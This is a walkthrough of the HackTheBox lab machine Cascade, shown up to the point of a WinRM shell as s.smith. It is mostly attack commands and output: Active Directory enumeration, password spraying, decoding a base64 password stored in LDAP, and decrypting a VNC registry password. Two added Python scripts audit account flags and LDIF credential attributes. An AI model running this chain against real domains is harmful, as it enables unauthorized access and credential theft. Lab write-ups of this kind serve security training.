This post is a walkthrough of the HackTheBox machine Cascade.
HackTheBox Cascade Walkthrough

Initial Enumeration
Nmap Commands and Scan Results
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.182
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.182
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -Pn -sC -sV -oN detailed.txt 10.10.10.182
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -script VULN 10.10.10.182
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.182
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.182
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 20:17 EST
Nmap scan report for 10.10.10.182
Host is up (0.061s latency).
Not shown: 65522 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
49154/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49170/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 34.48 seconds
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 20:17 EST
Nmap scan report for 10.10.10.182
Host is up (0.054s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
53/udp open domain
Nmap done: 1 IP address (1 host up) scanned in 13.70 seconds
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -Pn -sC -sV -oN detailed.txt 10.10.10.182
sudo nmap -p 53,88,135,139,389,445,636,3268,5985,49154-49170 -script VULN 10.10.10.182
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 20:21 EST
Nmap scan report for 10.10.10.182
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-17 01:21:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp filtered unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp filtered unknown
49160/tcp filtered unknown
49161/tcp filtered unknown
49162/tcp filtered unknown
49163/tcp filtered unknown
49164/tcp filtered unknown
49165/tcp filtered unknown
49166/tcp filtered unknown
49167/tcp filtered unknown
49168/tcp filtered unknown
49169/tcp filtered unknown
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host is up (0.051s latency).
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
|_sslv2-drown:
445/tcp open microsoft-ds
636/tcp open ldapssl
|_sslv2-drown:
3268/tcp open globalcatLDAP
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49156/tcp filtered unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp filtered unknown
49160/tcp filtered unknown
49161/tcp filtered unknown
49162/tcp filtered unknown
49163/tcp filtered unknown
49164/tcp filtered unknown
49165/tcp filtered unknown
49166/tcp filtered unknown
49167/tcp filtered unknown
49168/tcp filtered unknown
49169/tcp filtered unknown
49170/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 99.93 seconds
At this stage we know the target is running AD, SMB and DNS. The scan also shows the domain name "cascade.local", which I am adding to my /etc/hosts. Let's continue with SMB enumeration to find more hints.
SMB enumeration
enum4linux 10.10.10.182
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 16 20:28:40 2022
Users on 10.10.10.182
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc Name: BackupSvc Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman Name: David Burman Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen Name: Joseph Allen Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand Name: John Goodhand Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield Name: James Wakefield Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson Name: Stephanie Hickson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util Name: Util Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
Groups on 10.10.10.182
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472]
I have confirmed the hostname as "CASC-DC1.cascade.local", which I have also added to /etc/hosts. Refer below:
crackmapexec smb 10.10.10.182
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
┌──(rocky㉿kali)-[~/hckbox/cascade]
└─$ sudo nmap -p 389 --script ldap-rootdse.nse 10.10.10.182
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-16 22:42 EST
Nmap scan report for cascade.local (10.10.10.182)
Host is up (0.049s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20220217034243.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cascade,DC=local
| dsServiceName: CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local
| namingContexts: DC=cascade,DC=local
| namingContexts: CN=Configuration,DC=cascade,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
| namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
| namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
| defaultNamingContext: DC=cascade,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=cascade,DC=local
| configurationNamingContext: CN=Configuration,DC=cascade,DC=local
| rootDomainNamingContext: DC=cascade,DC=local
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 340251
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: CASC-DC1.cascade.local
| ldapServiceName: cascade.local:casc-dc1$@CASCADE.LOCAL
| serverName: CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 4
| forestFunctionality: 4
|_ domainControllerFunctionality: 4
Service Info: Host: CASC-DC1; OS: Windows 2008 R2
Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
rpcclient -U "" -N 10.10.10.182
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> exit
Let's copy these usernames into a text file (one per line) so that it can be used in the later part of the enumeration.

Using Impacket's GetNPUsers.py to request AS-REP hashes for accounts that do not require Kerberos pre-authentication. It did not return any hash.
$ GetNPUsers.py -dc-ip 10.10.10.182 cascade.local/ -usersfile users.txt -format john -outputfile cascadehash.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
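The acb field in the enum4linux output earlier encodes each account's MS-SAMR account-control bits, and it explains the KDC_ERR_CLIENT_REVOKED lines above: the KDC returns that error for disabled (or locked-out or expired) accounts, and the four accounts that produced it, CascGuest, e.crowe, b.hanson and i.croft, are exactly the ones whose acb has bit 0x1 (disabled) set. The Python below is an added example, not code from the original post, that parses those lines, decodes the flags, reports the hygiene findings a defender would care about (disabled accounts, password not required, pre-authentication disabled) and builds the users.txt list; the sample input is a subset of the lines shown above.

```python
import re

# MS-SAMR account-control bits (Samba ACB_* names) as shown in enum4linux's "acb:" field.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMDIRREQ",
    0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP",
    0x00000010: "NORMAL",
    0x00000020: "MNS",
    0x00000040: "DOMTRUST",
    0x00000080: "WSTRUST",
    0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
}

# One querydispinfo line as printed by enum4linux / rpcclient.
DISPINFO_RE = re.compile(
    r"index:\s*0x[0-9a-f]+\s+RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)"
    r"\s+Account:\s*(\S+)\s+Name:\s*(.*?)\s+Desc:\s*(.*)$",
    re.IGNORECASE,
)


def decode_acb(acb):
    """Return the flag names set in an acb value, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def parse_querydispinfo(text):
    """Parse enum4linux user lines; anything else (e.g. Perl warnings) is skipped."""
    accounts = []
    for line in text.splitlines():
        m = DISPINFO_RE.search(line)
        if not m:
            continue
        rid, acb, account, name, desc = m.groups()
        acb_value = int(acb, 16)
        accounts.append({
            "account": account,
            "rid": int(rid, 16),
            "acb": acb_value,
            "flags": decode_acb(acb_value),
            "name": name,
            "desc": desc,
        })
    return accounts


def audit_accounts(accounts):
    """Hygiene findings: disabled accounts (the KDC answers KDC_ERR_CLIENT_REVOKED for
    these), accounts with password-not-required set, and accounts without Kerberos pre-auth."""
    findings = {"disabled": [], "password_not_required": [], "no_preauth": []}
    for a in accounts:
        if "DISABLED" in a["flags"]:
            findings["disabled"].append(a["account"])
        if "PWNOTREQ" in a["flags"]:
            findings["password_not_required"].append(a["account"])
        if "DONT_REQUIRE_PREAUTH" in a["flags"]:
            findings["no_preauth"].append(a["account"])
    return findings


def users_file(accounts, include_disabled=False):
    """Contents of users.txt: one account per line, disabled accounts dropped by default."""
    names = [a["account"] for a in accounts
             if include_disabled or "DISABLED" not in a["flags"]]
    return "\n".join(names) + "\n"


# Sample: a subset of the enum4linux lines shown above, plus one of its Perl warnings.
SAMPLE_OUTPUT = """\
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null)
"""

if __name__ == "__main__":
    accounts = parse_querydispinfo(SAMPLE_OUTPUT)
    for a in accounts:
        print(f"{a['account']:<12} rid={a['rid']:<4} acb={a['acb']:#07x} {' '.join(a['flags'])}")
    print(audit_accounts(accounts))
    print(users_file(accounts), end="")
```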
I also tried these usernames with an empty password, and with the same password for each, to see if any of them would authenticate; none worked.
smbclient -L \\10.10.10.182\\ -U r.thompson%
smbclient -L \\10.10.10.182\\ -U util%
smbclient -L \\10.10.10.182\\ -U j.wakefield%
smbclient -L \\10.10.10.182\\ -U s.hickson%
smbclient -L \\10.10.10.182\\ -U j.goodhand%
smbclient -L \\10.10.10.182\\ -U e.crowe%
smbclient -L \\10.10.10.182\\ -U b.hanson%
smbclient -L \\10.10.10.182\\ -U d.burman%
smbclient -L \\10.10.10.182\\ -U BackupSvc%
smbclient -L \\10.10.10.182\\ -U j.allen%
smbclient -L \\10.10.10.182\\ -U i.croft%
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE
At this stage I don't have any hashes or passwords. Let's enumerate further at the Active Directory level with LDAP.
ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-entry
ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-person
The full result of the LDAP query can be found [here](Rchitect/ldap-entry at Yoda · tcprks/Rchitect · GitHub). I have also uploaded the filtered [output](Rchitect/ldap-person at Yoda · tcprks/Rchitect · GitHub).
In the filtered output we can see a custom attribute, cascadeLegacyPwd, on the r.thompson entry that holds a base64-encoded password:

echo clk0bjVldmE= | base64 -d
rY4n5eva
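The value above comes from the cascadeLegacyPwd attribute in the ldapsearch dump, a custom attribute that stores a base64-encoded plaintext password. The Python below is an added example, not code from the original post, of how a defender could sweep an LDIF export for attributes like that; SAMPLE_LDIF is constructed for this example (modelled on the ldapsearch output shown), and the same check also covers the cascadeLegacyPwd value found later on the deleted TempAdmin object.

```python
import base64
import re

# Attribute names that commonly carry legacy or migrated credentials.
SUSPECT_ATTR = re.compile(r"pwd|passw|secret|legacy", re.IGNORECASE)
# "name: value" or "name:: base64value" as written by ldapsearch.
ATTR_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9;.-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse ldapsearch LDIF output into a list of {"dn": ..., "attrs": {...}}.

    Handles folded lines (a continuation line starts with one space),
    '#' comments, and '::' (base64-encoded) attribute values.
    """
    # Unfold continuation lines first.
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)

    entries, current = [], None
    for line in lines:
        if not line.strip():            # a blank line ends the current entry
            if current is not None:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue                    # tolerate stray tool output
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if current is None:
            current = {"dn": None, "attrs": {}}
        if name.lower() == "dn":
            current["dn"] = value
        else:
            current["attrs"].setdefault(name, []).append(value)
    if current is not None:
        entries.append(current)
    return entries


def decode_if_base64_text(value):
    """Return the decoded string if value is base64 of printable ASCII, else None.

    Ciphertext (such as the AES blob in Audit.db) is also base64 but does not
    decode to printable text, so it is reported with decoded=None.
    """
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded and decoded.isprintable() else None


def find_legacy_credentials(ldif_text):
    """Flag credential-looking attributes on every entry in an LDIF dump."""
    hits = []
    for entry in parse_ldif(ldif_text):
        for attr, values in entry["attrs"].items():
            if not SUSPECT_ATTR.search(attr):
                continue
            for v in values:
                hits.append({"dn": entry["dn"], "attr": attr,
                             "raw": v, "decoded": decode_if_base64_text(v)})
    return hits


# Constructed sample, modelled on the ldapsearch '(objectClass=person)' output.
SAMPLE_LDIF = """\
# extended LDIF
#
# filter: (objectClass=person)

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: user
cn: Ryan Thompson
sAMAccountName: r.thompson
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=casc
 ade,DC=local
description:: Q29uc3RydWN0ZWQgc2FtcGxlIGVudHJ5
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
cn: Steve Smith
sAMAccountName: s.smith
"""

if __name__ == "__main__":
    for hit in find_legacy_credentials(SAMPLE_LDIF):
        print(f"{hit['dn']}\n  {hit['attr']} = {hit['raw']!r} -> {hit['decoded']!r}")
```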
Let's test the credentials first. They work for SMB but not for WinRM.
crackmapexec smb 10.10.10.182 -u r.thompson -p 'rY4n5eva'
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
┌──(rocky㉿kali)-[~]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p 'rY4n5eva'
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5eva
This probably means we need to find credentials for another user who is allowed remote access. Let's use the credentials we have and see whether we can access the SMB shares.
$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R
[+] IP: 10.10.10.182:445 Name: cascade.local
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 15:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 15:00:01 2020 VNC Install.reg
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
.\NETLOGON\*
The file "VNC Install.reg" above looks interesting. The full results of the above command are uploaded [here](Rchitect/smbmap-results at Yoda · tcprks/Rchitect · GitHub).
smbclient \\\\10.10.10.182\\Data -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> cd Temp
smb: \IT\Temp\> cd s.smith\
smb: \IT\Temp\s.smith\> ls
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
6553343 blocks of size 4096. 1623057 blocks available
smb: \IT\Temp\s.smith\> cd VNC Install.reg
cd \IT\Temp\s.smith\VNC\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Temp\s.smith\> get VNC Install.reg
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> get VNC Install.reg
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> mget *
Get file VNC Install.reg? y
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (11.4 KiloBytes/sec) (average 11.4 KiloBytes/sec)
smb: \IT\Temp\s.smith\> exit

I found a Python script, vncpasswd.py, that decrypts stored VNC passwords. Refer here.
cd vncpasswd.py
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ ls
build-aux d3des Dockerfile.bdist_rpm Makefile pass2reg.cmd setup.cfg VERSION WindowsRegistry
CHANGELOG.md Dockerfile LICENSE MANIFEST.in README.md setup.py vncpasswd.py
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ ./vncpasswd.py -h
usage: vncpasswd.py [-h] [-d] [-e] [-H] [-R] [-o] [-f FILENAME] [-t] [passwd]
Encrypt or Decrypt a VNC password
positional arguments:
passwd A password to encrypt
optional arguments:
-h, --help show this help message and exit
-d, --decrypt Decrypt an obfuscated password.
-e, --encrypt Encrypt a plaintext password. (default mode)
-H, --hex Assume input is in hex.
-R, --registry Input or Output to the windows registry.
-o, --stdout Input or Output only the resulting value to STDOUT.
Always output ciphertext in hexidecimal, and plaintext
in ASCII / UTF-8. A newline is appended to the value.
Useful for scripting.
-f FILENAME, --file FILENAME
Input or Output to a specified file.
-t, --test Run the unit tests for this program.
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'
Testing access with the new credentials:
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p 'sT333ve2'
WINRM 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
WINRM 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
┌──(rocky㉿kali)-[/opt/vncpasswd.py]
└─$ evil-winrm -i 10.10.10.182 -P 5985 -u s.smith -p 'sT333ve2'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>

The user does not seem to be privileged. Let's see whether s.smith has access to any interesting files via SMB.
smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R
